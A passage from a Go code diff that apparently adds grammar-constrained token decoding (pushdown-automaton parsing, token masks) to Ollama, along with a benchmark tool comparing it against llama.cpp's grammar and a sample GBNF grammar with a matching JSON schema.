func (b *bridge) advanceSingleConfig(cfg *parserConfig, pattern string) []*parserConfig {
|
||||
var results []*parserConfig
|
||||
visited := getVisitedMap()
|
||||
b.collectAdvanced(cfg.state, cfg.Stack, pattern, visited, &results)
|
||||
putVisitedMap(visited)
|
||||
return results
|
||||
}
|
||||
|
||||
// collectAdvanced collects all configs reachable by accepting the pattern
|
||||
func (b *bridge) collectAdvanced(state state, stack []stackSymbol, pattern string, visited map[stateStackKey]bool, results *[]*parserConfig) {
|
||||
key := stateStackKey{state: state, stackSig: stackSignature(stack)}
|
||||
if visited[key] {
|
||||
return
|
||||
}
|
||||
visited[key] = true
|
||||
|
||||
stackTop := stackEmpty
|
||||
if len(stack) > 0 {
|
||||
stackTop = stack[len(stack)-1]
|
||||
}
|
||||
|
||||
for _, t := range b.pda.Transitions[state] {
|
||||
// Check stack constraint
|
||||
if t.stackTop != stackEmpty && t.stackTop != stackTop {
|
||||
continue
|
||||
}
|
||||
|
||||
// Can't pop more than we have
|
||||
if t.StackPop > len(stack) {
|
||||
continue
|
||||
}
|
||||
|
||||
if t.Pattern == pattern {
|
||||
// Match! Create new config after transition
|
||||
newStack := make([]stackSymbol, len(stack))
|
||||
copy(newStack, stack)
|
||||
|
||||
if t.StackPop > 0 {
|
||||
newStack = newStack[:len(newStack)-t.StackPop]
|
||||
}
|
||||
newStack = append(newStack, t.StackPush...)
|
||||
|
||||
*results = append(*results, &parserConfig{
|
||||
state: t.ToState,
|
||||
Stack: newStack,
|
||||
})
|
||||
}
|
||||
|
||||
if t.Pattern == "" {
|
||||
// Epsilon transition - follow it
|
||||
newStack := make([]stackSymbol, len(stack))
|
||||
copy(newStack, stack)
|
||||
|
||||
if t.StackPop > 0 {
|
||||
newStack = newStack[:len(newStack)-t.StackPop]
|
||||
}
|
||||
newStack = append(newStack, t.StackPush...)
|
||||
|
||||
b.collectAdvanced(t.ToState, newStack, pattern, visited, results)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// validTokens returns all token IDs that are valid from the given config
|
||||
func (b *bridge) validTokens(config *configSet) []int {
|
||||
var valid []int
|
||||
for tokenID := 0; tokenID < b.analyzer.vocabSize(); tokenID++ {
|
||||
if b.IsTokenValid(tokenID, config) {
|
||||
valid = append(valid, tokenID)
|
||||
}
|
||||
}
|
||||
return valid
|
||||
}
|
||||
|
||||
// acceptToken attempts to accept a token and returns the new config set
|
||||
// Returns nil if the token is not valid from this config
|
||||
func (b *bridge) acceptToken(tokenID int, config *configSet) *configSet {
|
||||
analysis := b.analyzer.analysis(tokenID)
|
||||
|
||||
if !analysis.HasMatches {
|
||||
return nil
|
||||
}
|
||||
|
||||
// Fast path: exact terminal match
|
||||
if analysis.exactMatch >= 0 {
|
||||
terminal := b.analyzer.matcher.terminals[analysis.exactMatch]
|
||||
newConfig := b.advanceConfig(config, terminal.Pattern)
|
||||
if newConfig != nil && !newConfig.isEmpty() {
|
||||
newConfig.normalize()
|
||||
return newConfig
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// General path: DP to find final config after consuming token
|
||||
return b.dpAccept(&analysis, config)
|
||||
}
|
||||
|
||||
// dpAccept runs DP to accept a multi-terminal token and return final config
|
||||
// Returns the union of all possible end configurations (preserves nondeterminism)
|
||||
func (b *bridge) dpAccept(analysis *tokenAnalysis, startConfig *configSet) *configSet {
|
||||
type dpKey struct {
|
||||
pos int
|
||||
sig uint64
|
||||
}
|
||||
// Memoize the configs reachable at each (pos, sig)
|
||||
memo := make(map[dpKey]*configSet)
|
||||
|
||||
var dp func(pos int, config *configSet) *configSet
|
||||
dp = func(pos int, config *configSet) *configSet {
|
||||
if pos == len(analysis.Token) {
|
||||
return config // Consumed entire token, return final config
|
||||
}
|
||||
|
||||
if config.isEmpty() {
|
||||
return nil
|
||||
}
|
||||
|
||||
key := dpKey{pos, config.signature()}
|
||||
if result, ok := memo[key]; ok {
|
||||
return result
|
||||
}
|
||||
|
||||
// Collect all valid result configs from all possible paths
|
||||
var allConfigs []*parserConfig
|
||||
|
||||
// Try each terminal that matches at this position
|
||||
for _, match := range analysis.MatchesAtPos[pos] {
|
||||
terminal := b.analyzer.matcher.terminals[match.TerminalID]
|
||||
newConfig := b.advanceConfig(config, terminal.Pattern)
|
||||
if newConfig != nil && !newConfig.isEmpty() {
|
||||
finalConfig := dp(pos+match.Length, newConfig)
|
||||
if finalConfig != nil {
|
||||
// Collect all configs, don't return early
|
||||
allConfigs = append(allConfigs, finalConfig.configs...)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Build result: nil if no valid paths, normalized configSet otherwise
|
||||
var result *configSet
|
||||
if len(allConfigs) > 0 {
|
||||
result = &configSet{configs: allConfigs}
|
||||
result.normalize() // Dedup using parserConfig.key(), sort for consistent signature
|
||||
}
|
||||
memo[key] = result // Cache normalized result
|
||||
return result
|
||||
}
|
||||
|
||||
return dp(0, startConfig)
|
||||
}
|
||||
|
||||
// isAccepting returns true if any config can reach an accepting state
|
||||
func (b *bridge) isAccepting(config *configSet) bool {
|
||||
visited := getVisitedMap()
|
||||
defer putVisitedMap(visited)
|
||||
|
||||
for _, cfg := range config.configs {
|
||||
// Clear visited for each config check
|
||||
for k := range visited {
|
||||
delete(visited, k)
|
||||
}
|
||||
if b.canReachAccept(cfg.state, cfg.Stack, visited) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// canReachAccept checks if we can reach an accepting state via epsilon transitions
|
||||
func (b *bridge) canReachAccept(state state, stack []stackSymbol, visited map[stateStackKey]bool) bool {
|
||||
// Check if this state is accepting with empty stack
|
||||
if b.pda.AcceptStates[state] && len(stack) == 0 {
|
||||
return true
|
||||
}
|
||||
|
||||
key := stateStackKey{state: state, stackSig: stackSignature(stack)}
|
||||
if visited[key] {
|
||||
return false
|
||||
}
|
||||
visited[key] = true
|
||||
|
||||
// Try epsilon transitions
|
||||
stackTop := stackEmpty
|
||||
if len(stack) > 0 {
|
||||
stackTop = stack[len(stack)-1]
|
||||
}
|
||||
|
||||
for _, t := range b.pda.Transitions[state] {
|
||||
if t.Pattern != "" {
|
||||
continue // Not epsilon
|
||||
}
|
||||
if t.stackTop != stackEmpty && t.stackTop != stackTop {
|
||||
continue
|
||||
}
|
||||
if t.StackPop > len(stack) {
|
||||
continue
|
||||
}
|
||||
|
||||
newStack := make([]stackSymbol, len(stack))
|
||||
copy(newStack, stack)
|
||||
if t.StackPop > 0 {
|
||||
newStack = newStack[:len(newStack)-t.StackPop]
|
||||
}
|
||||
newStack = append(newStack, t.StackPush...)
|
||||
|
||||
if b.canReachAccept(t.ToState, newStack, visited) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
// validTerminals returns the valid terminal patterns from the given config
|
||||
func (b *bridge) validTerminals(config *configSet) []string {
|
||||
seen := make(map[string]bool)
|
||||
var terminals []string
|
||||
|
||||
visited := getVisitedMap()
|
||||
defer putVisitedMap(visited)
|
||||
|
||||
for _, cfg := range config.configs {
|
||||
// Clear visited for each config
|
||||
for k := range visited {
|
||||
delete(visited, k)
|
||||
}
|
||||
b.collectValidTerminals(cfg.state, cfg.Stack, visited, seen, &terminals)
|
||||
}
|
||||
|
||||
return terminals
|
||||
}
|
||||
|
||||
// collectValidTerminals collects all reachable terminals
|
||||
func (b *bridge) collectValidTerminals(state state, stack []stackSymbol, visited map[stateStackKey]bool, seen map[string]bool, terminals *[]string) {
|
||||
key := stateStackKey{state: state, stackSig: stackSignature(stack)}
|
||||
if visited[key] {
|
||||
return
|
||||
}
|
||||
visited[key] = true
|
||||
|
||||
stackTop := stackEmpty
|
||||
if len(stack) > 0 {
|
||||
stackTop = stack[len(stack)-1]
|
||||
}
|
||||
|
||||
for _, t := range b.pda.Transitions[state] {
|
||||
if t.stackTop != stackEmpty && t.stackTop != stackTop {
|
||||
continue
|
||||
}
|
||||
if t.StackPop > len(stack) {
|
||||
continue
|
||||
}
|
||||
|
||||
if t.Pattern != "" && !seen[t.Pattern] {
|
||||
seen[t.Pattern] = true
|
||||
*terminals = append(*terminals, t.Pattern)
|
||||
}
|
||||
|
||||
if t.Pattern == "" {
|
||||
newStack := make([]stackSymbol, len(stack))
|
||||
copy(newStack, stack)
|
||||
if t.StackPop > 0 {
|
||||
newStack = newStack[:len(newStack)-t.StackPop]
|
||||
}
|
||||
newStack = append(newStack, t.StackPush...)
|
||||
b.collectValidTerminals(t.ToState, newStack, visited, seen, terminals)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// validTerminalIDs returns the IDs of valid terminals from the given config
|
||||
func (b *bridge) validTerminalIDs(config *configSet) []int {
|
||||
seen := make(map[int]bool)
|
||||
var terminalIDs []int
|
||||
|
||||
visited := getVisitedMap()
|
||||
defer putVisitedMap(visited)
|
||||
|
||||
for _, cfg := range config.configs {
|
||||
// Clear visited for each config
|
||||
for k := range visited {
|
||||
delete(visited, k)
|
||||
}
|
||||
b.collectValidTerminalIDs(cfg.state, cfg.Stack, visited, seen, &terminalIDs)
|
||||
}
|
||||
|
||||
return terminalIDs
|
||||
}
|
||||
|
||||
// collectValidTerminalIDs collects IDs of all reachable terminals
|
||||
func (b *bridge) collectValidTerminalIDs(state state, stack []stackSymbol, visited map[stateStackKey]bool, seen map[int]bool, terminalIDs *[]int) {
|
||||
key := stateStackKey{state: state, stackSig: stackSignature(stack)}
|
||||
if visited[key] {
|
||||
return
|
||||
}
|
||||
visited[key] = true
|
||||
|
||||
stackTop := stackEmpty
|
||||
if len(stack) > 0 {
|
||||
stackTop = stack[len(stack)-1]
|
||||
}
|
||||
|
||||
for _, t := range b.pda.Transitions[state] {
|
||||
if t.stackTop != stackEmpty && t.stackTop != stackTop {
|
||||
continue
|
||||
}
|
||||
if t.StackPop > len(stack) {
|
||||
continue
|
||||
}
|
||||
|
||||
if t.Pattern != "" {
|
||||
// Look up terminal ID from pattern
|
||||
if tid, ok := b.analyzer.matcher.patternToID[t.Pattern]; ok && !seen[tid] {
|
||||
seen[tid] = true
|
||||
*terminalIDs = append(*terminalIDs, tid)
|
||||
}
|
||||
}
|
||||
|
||||
if t.Pattern == "" {
|
||||
newStack := make([]stackSymbol, len(stack))
|
||||
copy(newStack, stack)
|
||||
if t.StackPop > 0 {
|
||||
newStack = newStack[:len(newStack)-t.StackPop]
|
||||
}
|
||||
newStack = append(newStack, t.StackPush...)
|
||||
b.collectValidTerminalIDs(t.ToState, newStack, visited, seen, terminalIDs)
|
||||
}
|
||||
}
|
||||
}
|
||||
45
x/grammar/cmd/compare/complex.gbnf
Normal file
45
x/grammar/cmd/compare/complex.gbnf
Normal file
@@ -0,0 +1,45 @@
|
||||
root ::= ws "{" ws id-field "," ws kind-field "," ws items-field "," ws alt-field "," ws flags-field "," ws meta-field "," ws priority-field ws "}" ws
|
||||
|
||||
id-field ::= "\"id\"" ws ":" ws uuid
|
||||
kind-field ::= "\"kind\"" ws ":" ws kind
|
||||
items-field ::= "\"items\"" ws ":" ws items
|
||||
alt-field ::= "\"alt\"" ws ":" ws alt
|
||||
flags-field ::= "\"flags\"" ws ":" ws flags
|
||||
meta-field ::= "\"meta\"" ws ":" ws meta
|
||||
priority-field ::= "\"priority\"" ws ":" ws int
|
||||
|
||||
kind ::= "\"order\"" | "\"invoice\"" | "\"shipment\""
|
||||
status ::= "\"new\"" | "\"backorder\"" | "\"shipped\""
|
||||
flag ::= "\"fragile\"" | "\"gift\"" | "\"priority\"" | "\"insured\""
|
||||
source ::= "\"api\"" | "\"batch\"" | "\"import\""
|
||||
|
||||
items ::= "[" ws item ( "," ws item )? ( "," ws item )? ws "]"
|
||||
flags ::= "[" ws "]" | "[" ws flag ( "," ws flag )? ( "," ws flag )? ( "," ws flag )? ws "]"
|
||||
|
||||
item ::= "{" ws item-sku "," ws item-qty "," ws item-status "," ws item-notes ws "}"
|
||||
item-sku ::= "\"sku\"" ws ":" ws string
|
||||
item-qty ::= "\"qty\"" ws ":" ws int
|
||||
item-status ::= "\"status\"" ws ":" ws status
|
||||
item-notes ::= "\"notes\"" ws ":" ws string
|
||||
|
||||
meta ::= "{" ws meta-created "," ws meta-source "," ws meta-ip ws "}"
|
||||
meta-created ::= "\"created\"" ws ":" ws date-time
|
||||
meta-source ::= "\"source\"" ws ":" ws source
|
||||
meta-ip ::= "\"ip\"" ws ":" ws ipv4
|
||||
|
||||
alt ::= string | int | "null"
|
||||
|
||||
uuid ::= "\"" hex hex hex hex hex hex hex hex "-" hex hex hex hex "-" hex hex hex hex "-" hex hex hex hex "-" hex hex hex hex hex hex hex hex hex hex hex hex "\""
|
||||
date-time ::= "\"" digit digit digit digit "-" digit digit "-" digit digit "T" digit digit ":" digit digit ":" digit digit ( "Z" | ( "+" | "-" ) digit digit ":" digit digit ) "\""
|
||||
ipv4 ::= "\"" digit+ "." digit+ "." digit+ "." digit+ "\""
|
||||
|
||||
string ::= "\"" characters "\""
|
||||
characters ::= character*
|
||||
character ::= [^"\\] | "\\" escape
|
||||
escape ::= ["\\bfnrt]
|
||||
|
||||
int ::= "-"? digit+
|
||||
digit ::= [0-9]
|
||||
hex ::= [0-9a-fA-F]
|
||||
|
||||
ws ::= [ \t\n\r]*
|
||||
46
x/grammar/cmd/compare/complex.schema.json
Normal file
46
x/grammar/cmd/compare/complex.schema.json
Normal file
@@ -0,0 +1,46 @@
|
||||
{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"id": { "type": "string", "format": "uuid" },
|
||||
"kind": { "enum": ["order", "invoice", "shipment"] },
|
||||
"items": {
|
||||
"type": "array",
|
||||
"minItems": 1,
|
||||
"maxItems": 3,
|
||||
"items": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"sku": { "type": "string" },
|
||||
"qty": { "type": "integer" },
|
||||
"status": { "enum": ["new", "backorder", "shipped"] },
|
||||
"notes": { "type": "string" }
|
||||
},
|
||||
"required": ["sku", "qty", "status", "notes"]
|
||||
}
|
||||
},
|
||||
"alt": {
|
||||
"oneOf": [
|
||||
{ "type": "string" },
|
||||
{ "type": "null" },
|
||||
{ "type": "integer" }
|
||||
]
|
||||
},
|
||||
"flags": {
|
||||
"type": "array",
|
||||
"minItems": 0,
|
||||
"maxItems": 4,
|
||||
"items": { "enum": ["fragile", "gift", "priority", "insured"] }
|
||||
},
|
||||
"meta": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"created": { "type": "string", "format": "date-time" },
|
||||
"source": { "enum": ["api", "batch", "import"] },
|
||||
"ip": { "type": "string", "format": "ipv4" }
|
||||
},
|
||||
"required": ["created", "source", "ip"]
|
||||
},
|
||||
"priority": { "type": "integer" }
|
||||
},
|
||||
"required": ["id", "kind", "items", "alt", "flags", "meta", "priority"]
|
||||
}
|
||||
235
x/grammar/cmd/compare/main.go
Normal file
235
x/grammar/cmd/compare/main.go
Normal file
@@ -0,0 +1,235 @@
|
||||
//go:build mlx
|
||||
|
||||
package main
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"flag"
|
||||
"fmt"
|
||||
"os"
|
||||
"time"
|
||||
|
||||
"github.com/ollama/ollama/llama"
|
||||
"github.com/ollama/ollama/x/grammar"
|
||||
"github.com/ollama/ollama/x/grammar/schema"
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
)
|
||||
|
||||
const jsonGBNF = `
|
||||
root ::= value
|
||||
value ::= object | array | string | number | "true" | "false" | "null"
|
||||
object ::= "{" ws "}" | "{" members "}"
|
||||
members ::= member ("," member)*
|
||||
member ::= ws string ws ":" element
|
||||
array ::= "[" ws "]" | "[" elements "]"
|
||||
elements ::= element ("," element)*
|
||||
element ::= ws value ws
|
||||
string ::= "\"" characters "\""
|
||||
characters ::= character*
|
||||
character ::= [^"\\] | "\\" escape
|
||||
escape ::= ["\\bfnrt]
|
||||
number ::= "-"? integer fraction? exponent?
|
||||
integer ::= "0" | [1-9] [0-9]*
|
||||
fraction ::= "." [0-9]+
|
||||
exponent ::= [eE] [+-]? [0-9]+
|
||||
ws ::= [ \t\n\r]*
|
||||
`
|
||||
|
||||
type result struct {
|
||||
vocabSize int `json:"vocab_size"`
|
||||
Iterations int `json:"iterations"`
|
||||
Warmup int `json:"warmup"`
|
||||
ConstrainedSource string `json:"constrained_source"`
|
||||
LlamaSource string `json:"llama_source"`
|
||||
LlamaApply string `json:"llama_apply"`
|
||||
ConstrainedGraph string `json:"constrained_graph"`
|
||||
ConstrainedWithEval string `json:"constrained_with_eval,omitempty"`
|
||||
EvalOnly string `json:"eval_only,omitempty"`
|
||||
ConstrainedEvalNet string `json:"constrained_eval_net,omitempty"`
|
||||
}
|
||||
|
||||
func main() {
|
||||
var (
|
||||
vocabSize = flag.Int("vocab-size", 128000, "Vocabulary size")
|
||||
iterations = flag.Int("iterations", 500, "Benchmark iterations")
|
||||
warmup = flag.Int("warmup", 50, "Warmup iterations")
|
||||
withEval = flag.Bool("eval", true, "Measure ApplyMask with mlx.Eval")
|
||||
gbnfPath = flag.String("gbnf", "", "GBNF grammar file for llama.cpp")
|
||||
schemaPath = flag.String("schema", "", "JSON Schema file for grammar constraints")
|
||||
ebnfPath = flag.String("ebnf", "", "EBNF grammar file for grammar constraints")
|
||||
startRule = flag.String("start", "root", "Start rule for EBNF")
|
||||
)
|
||||
flag.Parse()
|
||||
|
||||
if *vocabSize <= 0 || *iterations <= 0 || *warmup < 0 {
|
||||
fmt.Fprintln(os.Stderr, "invalid flags")
|
||||
os.Exit(2)
|
||||
}
|
||||
|
||||
vocab := createVocab(*vocabSize)
|
||||
|
||||
if *schemaPath != "" && *ebnfPath != "" {
|
||||
fmt.Fprintln(os.Stderr, "only one of -schema or -ebnf may be set")
|
||||
os.Exit(2)
|
||||
}
|
||||
|
||||
var constrainedSource string
|
||||
var compiled *grammar.Grammar
|
||||
var err error
|
||||
switch {
|
||||
case *schemaPath != "":
|
||||
data, readErr := os.ReadFile(*schemaPath)
|
||||
if readErr != nil {
|
||||
fmt.Fprintf(os.Stderr, "read schema: %v\n", readErr)
|
||||
os.Exit(1)
|
||||
}
|
||||
compiled, err = schema.Grammar(string(data))
|
||||
constrainedSource = "schema:" + *schemaPath
|
||||
case *ebnfPath != "":
|
||||
data, readErr := os.ReadFile(*ebnfPath)
|
||||
if readErr != nil {
|
||||
fmt.Fprintf(os.Stderr, "read ebnf: %v\n", readErr)
|
||||
os.Exit(1)
|
||||
}
|
||||
compiled, err = grammar.ParseEBNF(string(data), *startRule)
|
||||
constrainedSource = "ebnf:" + *ebnfPath
|
||||
default:
|
||||
compiled, err = grammar.JSONGrammar()
|
||||
constrainedSource = "json"
|
||||
}
|
||||
if err != nil {
|
||||
fmt.Fprintf(os.Stderr, "grammar: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
engine, err := grammar.NewEngine(compiled, vocab)
|
||||
if err != nil {
|
||||
fmt.Fprintf(os.Stderr, "engine: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
defer engine.Close()
|
||||
|
||||
logits := mlx.Ones(int32(*vocabSize))
|
||||
mlx.Keep(logits)
|
||||
|
||||
for i := 0; i < *warmup; i++ {
|
||||
masked := engine.ApplyMask(logits)
|
||||
if *withEval {
|
||||
mlx.Eval(masked)
|
||||
}
|
||||
}
|
||||
|
||||
graphAvg := measure(*iterations, func() {
|
||||
_ = engine.ApplyMask(logits)
|
||||
})
|
||||
|
||||
var evalAvg time.Duration
|
||||
var evalOnlyAvg time.Duration
|
||||
if *withEval {
|
||||
evalOnlyAvg = measure(*iterations, func() {
|
||||
baseline := mlx.MulScalar(logits, 1)
|
||||
mlx.Eval(baseline)
|
||||
baseline.Free()
|
||||
})
|
||||
|
||||
evalAvg = measure(*iterations, func() {
|
||||
masked := engine.ApplyMask(logits)
|
||||
mlx.Eval(masked)
|
||||
})
|
||||
}
|
||||
|
||||
vocabIDs := make([]uint32, *vocabSize)
|
||||
for i := range vocabIDs {
|
||||
vocabIDs[i] = uint32(i)
|
||||
}
|
||||
eogTokens := []int32{0}
|
||||
|
||||
gbnf := jsonGBNF
|
||||
llamaSource := "json"
|
||||
if *gbnfPath != "" {
|
||||
data, readErr := os.ReadFile(*gbnfPath)
|
||||
if readErr != nil {
|
||||
fmt.Fprintf(os.Stderr, "read gbnf: %v\n", readErr)
|
||||
os.Exit(1)
|
||||
}
|
||||
gbnf = string(data)
|
||||
llamaSource = *gbnfPath
|
||||
}
|
||||
|
||||
llamaGrammar := llama.NewGrammar(gbnf, vocabIDs, vocab, eogTokens)
|
||||
if llamaGrammar == nil {
|
||||
fmt.Fprintln(os.Stderr, "llama grammar initialization failed")
|
||||
os.Exit(1)
|
||||
}
|
||||
defer llamaGrammar.Free()
|
||||
|
||||
llamaTokens := make([]llama.TokenData, *vocabSize)
|
||||
|
||||
for i := 0; i < *warmup; i++ {
|
||||
for j := range llamaTokens {
|
||||
llamaTokens[j].Logit = 1.0
|
||||
}
|
||||
llamaGrammar.Apply(llamaTokens)
|
||||
}
|
||||
|
||||
llamaAvg := measure(*iterations, func() {
|
||||
for j := range llamaTokens {
|
||||
llamaTokens[j].Logit = 1.0
|
||||
}
|
||||
llamaGrammar.Apply(llamaTokens)
|
||||
})
|
||||
|
||||
out := result{
|
||||
vocabSize: *vocabSize,
|
||||
Iterations: *iterations,
|
||||
Warmup: *warmup,
|
||||
LlamaApply: llamaAvg.String(),
|
||||
ConstrainedGraph: graphAvg.String(),
|
||||
ConstrainedSource: constrainedSource,
|
||||
LlamaSource: llamaSource,
|
||||
}
|
||||
if *withEval {
|
||||
out.ConstrainedWithEval = evalAvg.String()
|
||||
out.EvalOnly = evalOnlyAvg.String()
|
||||
if evalAvg > evalOnlyAvg {
|
||||
out.ConstrainedEvalNet = (evalAvg - evalOnlyAvg).String()
|
||||
} else {
|
||||
out.ConstrainedEvalNet = "0s"
|
||||
}
|
||||
}
|
||||
|
||||
enc := json.NewEncoder(os.Stdout)
|
||||
if err := enc.Encode(out); err != nil {
|
||||
fmt.Fprintf(os.Stderr, "encode: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
}
|
||||
|
||||
func measure(iterations int, fn func()) time.Duration {
|
||||
start := time.Now()
|
||||
for i := 0; i < iterations; i++ {
|
||||
fn()
|
||||
}
|
||||
return time.Since(start) / time.Duration(iterations)
|
||||
}
|
||||
|
||||
func createVocab(size int) []string {
|
||||
vocab := make([]string, size)
|
||||
|
||||
jsonTokens := []string{
|
||||
"{", "}", "[", "]", ":", ",",
|
||||
"true", "false", "null",
|
||||
" ", "\n", "\t", "\r",
|
||||
"\"",
|
||||
}
|
||||
for i, t := range jsonTokens {
|
||||
if i < size {
|
||||
vocab[i] = t
|
||||
}
|
||||
}
|
||||
|
||||
for i := len(jsonTokens); i < size; i++ {
|
||||
vocab[i] = fmt.Sprintf("tok%d", i)
|
||||
}
|
||||
|
||||
return vocab
|
||||
}
|
||||
320
x/grammar/compiled.go
Normal file
320
x/grammar/compiled.go
Normal file
@@ -0,0 +1,320 @@
|
||||
//go:build mlx
|
||||
|
||||
package grammar
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"strconv"
|
||||
"strings"
|
||||
"unicode/utf8"
|
||||
)
|
||||
|
||||
// Grammar is the compiled form of an EBNF grammar.
|
||||
// It contains terminals, parse tables, and the start state.
|
||||
// Use ParseEBNF or JSONGrammar to create a Grammar.
|
||||
type Grammar struct {
|
||||
// The underlying pda
|
||||
pda *pda
|
||||
|
||||
// Compiled terminal matcher
|
||||
matcher *terminalMatcher
|
||||
}
|
||||
|
||||
// ParseEBNF compiles an EBNF grammar string into a Grammar.
|
||||
// startRule is the name of the start rule (e.g., "root", "json").
|
||||
func ParseEBNF(ebnf string, startRule string) (*Grammar, error) {
|
||||
pda, err := compileString(ebnf, startRule)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to compile EBNF: %w", err)
|
||||
}
|
||||
|
||||
matcher, err := compileTerminalsStrict(pda)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to compile terminals: %w", err)
|
||||
}
|
||||
|
||||
return &Grammar{
|
||||
pda: pda,
|
||||
matcher: matcher,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// JSONGrammar returns the compiled JSON grammar.
|
||||
// This is a convenience wrapper for ParseEBNF(JSONGrammarEBNF, "json").
|
||||
func JSONGrammar() (*Grammar, error) {
|
||||
return ParseEBNF(JSONGrammarEBNF, "json")
|
||||
}
|
||||
|
||||
// JSONObjectGrammar returns a JSON grammar that only allows objects at the top level.
|
||||
// Use this when you want to ensure the output is a JSON object (starts with {).
|
||||
func JSONObjectGrammar() (*Grammar, error) {
|
||||
return ParseEBNF(JSONObjectGrammarEBNF, "json")
|
||||
}
|
||||
|
||||
// compileTerminalsStrict builds a matcher that properly handles:
|
||||
// - Escaped literals ("\n", \"", \uXXXX)
|
||||
// - Unicode ranges (rune-based, not byte-based)
|
||||
// - Rejects unsupported patterns with an error (no silent fallback)
|
||||
func compileTerminalsStrict(pda *pda) (*terminalMatcher, error) {
|
||||
m := &terminalMatcher{
|
||||
literalTrie: &trieNode{terminalID: -1},
|
||||
ranges: make([]terminal, 0),
|
||||
terminals: make([]terminal, 0, len(pda.Terminals)),
|
||||
patternToID: make(map[string]int),
|
||||
}
|
||||
|
||||
// Track which pattern produced each unescaped value for collision detection
|
||||
unescapedSource := make(map[string]string) // unescaped -> original pattern
|
||||
|
||||
for i, pattern := range pda.Terminals {
|
||||
terminal, err := parseTerminalPattern(pattern, i)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("terminal %q: %w", pattern, err)
|
||||
}
|
||||
|
||||
if terminal.Type == terminalLiteral {
|
||||
// Use the unescaped pattern for trie matching
|
||||
m.addLiteralToTrie(terminal.Unescaped, i)
|
||||
|
||||
// Detect collisions between literals that unescape to the same value
|
||||
if existingPattern, exists := unescapedSource[terminal.Unescaped]; exists {
|
||||
if existingPattern != pattern {
|
||||
return nil, fmt.Errorf("collision: patterns %q and %q both unescape to %q",
|
||||
existingPattern, pattern, terminal.Unescaped)
|
||||
}
|
||||
} else {
|
||||
unescapedSource[terminal.Unescaped] = pattern
|
||||
}
|
||||
} else if terminal.Type == terminalRange {
|
||||
m.ranges = append(m.ranges, terminal)
|
||||
}
|
||||
|
||||
m.terminals = append(m.terminals, terminal)
|
||||
m.patternToID[pattern] = i
|
||||
}
|
||||
|
||||
return m, nil
|
||||
}
|
||||
|
||||
// parseTerminalPattern parses a terminal pattern and returns a terminal.
|
||||
// Supports:
|
||||
// - Literal strings (with escape sequences)
|
||||
// - Character ranges [X-Y] (unicode-aware)
|
||||
func parseTerminalPattern(pattern string, id int) (terminal, error) {
|
||||
if len(pattern) == 0 {
|
||||
return terminal{}, fmt.Errorf("empty pattern")
|
||||
}
|
||||
|
||||
// Check for range pattern: [X-Y]
|
||||
if isUnicodeRangePattern(pattern) {
|
||||
lowRune, highRune, err := parseUnicodeRange(pattern)
|
||||
if err != nil {
|
||||
return terminal{}, err
|
||||
}
|
||||
return terminal{
|
||||
ID: id,
|
||||
Type: terminalRange,
|
||||
Pattern: pattern,
|
||||
Unescaped: pattern,
|
||||
LowRune: lowRune,
|
||||
HighRune: highRune,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// It's a literal - unescape it
|
||||
unescaped, err := unescapeLiteral(pattern)
|
||||
if err != nil {
|
||||
return terminal{}, fmt.Errorf("invalid escape sequence: %w", err)
|
||||
}
|
||||
|
||||
return terminal{
|
||||
ID: id,
|
||||
Type: terminalLiteral,
|
||||
Pattern: pattern,
|
||||
Unescaped: unescaped,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// isUnicodeRangePattern checks if pattern is a character range like [a-z] or [\u0000-\uFFFF]
|
||||
func isUnicodeRangePattern(pattern string) bool {
|
||||
if len(pattern) < 5 || pattern[0] != '[' || pattern[len(pattern)-1] != ']' {
|
||||
return false
|
||||
}
|
||||
// Find the dash that separates low-high
|
||||
inner := pattern[1 : len(pattern)-1]
|
||||
dashIdx := strings.Index(inner, "-")
|
||||
// Handle escaped dash at start
|
||||
if dashIdx <= 0 {
|
||||
return false
|
||||
}
|
||||
return true
|
||||
}
|
||||
|
||||
// parseUnicodeRange parses [X-Y] into low and high runes
|
||||
func parseUnicodeRange(pattern string) (rune, rune, error) {
|
||||
if len(pattern) < 5 || pattern[0] != '[' || pattern[len(pattern)-1] != ']' {
|
||||
return 0, 0, fmt.Errorf("invalid range pattern")
|
||||
}
|
||||
|
||||
inner := pattern[1 : len(pattern)-1]
|
||||
|
||||
// Simple case: [a-z] where a and z are single chars
|
||||
if len(inner) == 3 && inner[1] == '-' {
|
||||
return rune(inner[0]), rune(inner[2]), nil
|
||||
}
|
||||
|
||||
// Handle escaped characters like [\u0000-\uFFFF]
|
||||
dashIdx := findRangeDash(inner)
|
||||
if dashIdx < 0 {
|
||||
return 0, 0, fmt.Errorf("no dash in range")
|
||||
}
|
||||
|
||||
lowStr := inner[:dashIdx]
|
||||
highStr := inner[dashIdx+1:]
|
||||
|
||||
lowRune, err := parseRune(lowStr)
|
||||
if err != nil {
|
||||
return 0, 0, fmt.Errorf("invalid low bound: %w", err)
|
||||
}
|
||||
|
||||
highRune, err := parseRune(highStr)
|
||||
if err != nil {
|
||||
return 0, 0, fmt.Errorf("invalid high bound: %w", err)
|
||||
}
|
||||
|
||||
if lowRune > highRune {
|
||||
return 0, 0, fmt.Errorf("low bound > high bound")
|
||||
}
|
||||
|
||||
return lowRune, highRune, nil
|
||||
}
|
||||
|
||||
// findRangeDash finds the dash separating low-high in a range pattern
|
||||
func findRangeDash(inner string) int {
|
||||
i := 0
|
||||
for i < len(inner) {
|
||||
if inner[i] == '\\' && i+1 < len(inner) {
